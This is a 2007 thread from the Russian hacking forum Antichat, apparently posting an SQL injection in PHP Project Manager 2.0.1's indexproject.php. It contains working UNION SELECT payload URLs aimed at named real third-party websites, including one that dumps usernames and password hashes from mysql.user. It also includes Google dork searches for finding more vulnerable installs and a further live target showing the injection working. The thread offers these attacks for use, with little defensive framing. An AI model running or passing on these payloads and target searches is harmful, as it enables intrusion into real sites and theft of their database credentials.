ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

sql inj PHP Project Manager => 2.0.1
  #1  
Старый 23.03.2007, 13:09
Аватар для BlackCats
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548

Репутация: 1942


Exclamation sql inj PHP Project Manager => 2.0.1

изначально уязвимость предполагалось для того чтобы меня взяли в моа, но т.к. меня послали - я её выкладываю.

PHP Project Manager
версия => 2.0.1
описание:
Уязвимость существует в сценарии indexproject.php из-за недостаточной обработки входных данных.
пример:
Код:
http://www.ia.unc.edu/dev/manager/indexproject.php?id=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35/*
на секлабе баги нету(ну и вроде в др местах тоже)
 
Ответить с цитированием

  #2  
Старый 23.03.2007, 13:25
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

хэк=)
 
Ответить с цитированием

  #3  
Старый 23.03.2007, 22:08
Аватар для Colkru
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
Отправить сообщение для Colkru с помощью ICQ
По умолчанию

Молодец, правда скрипт не популярен, не думаю что в МОА было бы комуто интересно...
 
Ответить с цитированием

  #4  
Старый 23.03.2007, 22:16
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

и это все??? нда, коварно..
я думал ты хоть подобрал названия таблиц..
 
Ответить с цитированием

  #5  
Старый 23.03.2007, 22:21
Аватар для BlackCats
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548

Репутация: 1942


По умолчанию

Цитата:
Сообщение от Rebz  
и это все??? нда, коварно..
я думал ты хоть подобрал названия таблиц..
зачем? я же просто привёл пример.. и только-то..
 
Ответить с цитированием

  #6  
Старый 23.03.2007, 22:23
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

мде =\
Код:
http://www.ia.unc.edu/dev/manager/indexproject.php?id=-35+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+mysql.user/*
это в sqlz можно..

Последний раз редактировалось n1†R0x; 24.03.2007 в 22:52..
 
Ответить с цитированием

  #7  
Старый 25.03.2007, 11:15
Аватар для BlackCats
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548

Репутация: 1942


По умолчанию

Цитата:
Сообщение от n1†R0x  
мде =\
Код:
http://www.ia.unc.edu/dev/manager/indexproject.php?id=-35+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+mysql.user/*
это в sqlz можно..
понимаеш в чём разница.. когда скуля на самописном сайте - это одно, а когда в движке, это другое.
 
Ответить с цитированием

  #8  
Старый 25.03.2007, 11:20
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Цитата:
Сообщение от \6/  
понимаеш в чём разница.. когда скуля на самописном сайте - это одно, а когда в движке, это другое.
порой самописные сайты бывают лучше защищены, чем средние Cms.
я понял твою мысль..
 
Ответить с цитированием

  #9  
Старый 25.03.2007, 12:34
Аватар для BlackCats
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548

Репутация: 1942


По умолчанию

ну вот и хорошо
следующий..
 
Ответить с цитированием

  #10  
Старый 25.03.2007, 12:47
Аватар для -=lebed=-
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

Цитата:
следующий..
я

Строка для поиска в гугл: inurl:indexproject.php?id

Мдя, не густо:
Код:
http://www.google.ru/search?hl=ru&q=inurl%3Aindexproject.php%3Fid&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=
и так тоже:
Код:
http://www.google.ru/search?hl=ru&newwindow=1&q=%22PHP+Project+Manager+2.0.1%22&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=
Ну да, скуль есть:
Код:
http://www.nuevoparadigma.com/proyectos/indexproject.php?id=-1+union+select+1,version(),3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*
Цитата:
PHP Project Manager 2.0.1 © 2004 - www.jomier.com
тока двиг не популярный...

Последний раз редактировалось -=lebed=-; 25.03.2007 в 13:08..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ